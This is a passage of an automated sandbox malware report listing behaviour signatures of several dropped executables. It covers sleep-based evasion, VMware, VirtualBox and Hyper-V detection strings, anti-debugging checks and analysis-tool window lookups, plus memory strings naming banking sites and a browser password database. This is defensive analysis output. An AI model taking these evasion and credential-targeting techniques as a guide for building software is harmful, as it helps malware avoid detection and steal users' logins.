Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 10872 | Thread sleep time: -90045s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 2668 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8112 | Thread sleep time: -150000s >= -30000s
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Thread sleep count: Count: 1035 delay: -10
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Thread sleep count: Count: 1385 delay: -10
Source: C:\Users\user\Desktop\file.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\rundll32.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_0010C2A2 FindFirstFileExW,4_2_0010C2A2
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_001468EE FindFirstFileW,FindClose,4_2_001468EE
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_0014698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,4_2_0014698F
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_0013D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,4_2_0013D076
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_0013D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,4_2_0013D3A9
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_00149642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_00149642
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_0014979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_0014979D
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_00149B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,4_2_00149B2B
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_0013DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,4_2_0013DBBE
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_00145C97 FindFirstFileW,FindNextFileW,FindClose,4_2_00145C97
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_008333B0 FindFirstFileA,FindNextFileA,8_2_008333B0
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_00853B20 FindFirstFileA,FindNextFileA,SetFileAttributesA,RemoveDirectoryA,std::_Throw_Cpp_error,std::_Throw_Cpp_error,8_2_00853B20
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_007A1F8C FindFirstFileExW,8_2_007A1F8C
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_000D42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,4_2_000D42DE
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe | File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: RageMP131.exe, 0000001F.00000002.2450136740.00000000014F9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWx
Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: MPGPH131.exe, 00000013.00000002.2506556496.0000000007E40000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}B
Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696428655
Source: explorta.exe, 00000002.00000002.3253602072.00000000014F4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWe
Source: svchost.exe, 0000001E.00000003.2431230424.000001EFCEC58000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: NXTcpV6VMWare
Source: explorta.exe, 00000002.00000002.3253602072.00000000014F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3326542226.000002AF2AC57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3254451023.000002AF2542B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000002.2511321549.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2500776200.0000000001730000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2500776200.00000000016F7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000018.00000002.2404856512.0000000001440000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000018.00000002.2404856512.000000000140E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: RageMP131.exe, 0000001F.00000003.2387394578.00000000014E2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: 2531414c80.exe, 00000008.00000002.2516925001.0000000007C0B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}gramFiles=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowsta_dat
Source: MPGPH131.exe, 00000013.00000002.2500776200.000000000170A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}2
Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: MPGPH131.exe, 00000013.00000002.2500776200.000000000169D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696428655
Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 2531414c80.exe, 00000008.00000002.2516925001.0000000007BF8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\Profiles\v6zchhhv.default-release\signons.sqlite
Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2008235072.00000000017F2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
                                Source: MPGPH131.exe, 00000014.00000003.2365629446.0000000000B62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_7BBA5097eq
                                Source: MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\*
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                                Source: MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWv>
                                Source: 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_7BBA5097e
                                Source: MPGPH131.exe, 00000014.00000002.2529795385.0000000000ACD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW #
                                Source: MPGPH131.exe, 00000014.00000002.2539684694.0000000007990000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}ill_sync_metadata
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                                Source: explorta.exe, explorta.exe, 00000003.00000002.2067305894.0000000000791000.00000040.00000001.01000000.00000007.sdmp, 2531414c80.exe, 2531414c80.exe, 00000008.00000002.2507620764.0000000000A8D000.00000040.00000001.01000000.0000000C.sdmp, MPGPH131.exe, 00000013.00000002.2498548418.00000000011FD000.00000040.00000001.01000000.0000000D.sdmp, MPGPH131.exe, 00000014.00000002.2531990247.00000000011FD000.00000040.00000001.01000000.0000000D.sdmp, 2531414c80.exe, 00000018.00000002.2403608510.0000000000A8D000.00000040.00000001.01000000.0000000C.sdmp, amert.exe, 0000001A.00000002.2452955674.0000000000A5E000.00000040.00000001.01000000.0000000E.sdmp, RageMP131.exe, 0000001F.00000002.2448644551.000000000106D000.00000040.00000001.01000000.00000010.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                                Source: RageMP131.exe, 0000001F.00000002.2450136740.0000000001460000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
                                Source: MPGPH131.exe, 00000014.00000003.2365629446.0000000000B62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_7BBA5097
                                Source: b3168c3d9b.exe, 0000000F.00000003.2488602462.0000000003F64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\(a
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                                Source: RageMP131.exe, 0000001F.00000002.2450136740.00000000014DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: 2531414c80.exe, 00000008.00000002.2511321549.000000000149E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&0<
                                Source: MPGPH131.exe, 00000013.00000002.2507231203.0000000008422000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}*k#
                                Source: MPGPH131.exe, 00000014.00000003.2235461744.0000000000AE6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}w>
                                Source: MPGPH131.exe, 00000014.00000002.2529795385.0000000000A78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&U?
                                Source: amert.exe, 0000001A.00000003.2428413473.00000000011CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{5
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                                Source: explorta.exe, 00000002.00000002.3253602072.00000000014B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0wO
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                                Source: MPGPH131.exe, 00000013.00000003.2358561956.00000000085AA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: b3168c3d9b.exe, 00000004.00000002.2415455709.00000000010E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                                Source: b3168c3d9b.exe, 0000000F.00000003.2488602462.0000000003F64000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qc
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
                                Source: file.exe, 00000000.00000002.2026963565.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, explorta.exe, 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmp, explorta.exe, 00000003.00000002.2067305894.0000000000791000.00000040.00000001.01000000.00000007.sdmp, 2531414c80.exe, 00000008.00000002.2507620764.0000000000A8D000.00000040.00000001.01000000.0000000C.sdmp, MPGPH131.exe, 00000013.00000002.2498548418.00000000011FD000.00000040.00000001.01000000.0000000D.sdmp, MPGPH131.exe, 00000014.00000002.2531990247.00000000011FD000.00000040.00000001.01000000.0000000D.sdmp, 2531414c80.exe, 00000018.00000002.2403608510.0000000000A8D000.00000040.00000001.01000000.0000000C.sdmp, amert.exe, 0000001A.00000002.2452955674.0000000000A5E000.00000040.00000001.01000000.0000000E.sdmp, RageMP131.exe, 0000001F.00000002.2448644551.000000000106D000.00000040.00000001.01000000.00000010.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                                Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
                                Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

                                Anti Debugging

                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep graph_4-97330
                                Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Thread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Thread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe Thread information set: HideFromDebugger
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe Thread information set: HideFromDebugger
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe Thread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe Thread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe Thread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Thread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Thread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe Thread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Thread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Thread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Thread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe Code function: 8_2_051502BB Start: 05150AAE End: 05150340 8_2_051502BB
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Open window title or class name: regmonclass
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Open window title or class name: gbdyllo
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Open window title or class name: procmon_window_class
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Open window title or class name: ollydbg
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Open window title or class name: filemonclass
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe File opened: NTICE
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe File opened: SICE
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe File opened: SIWVID
                                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe Process queried: DebugPort
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
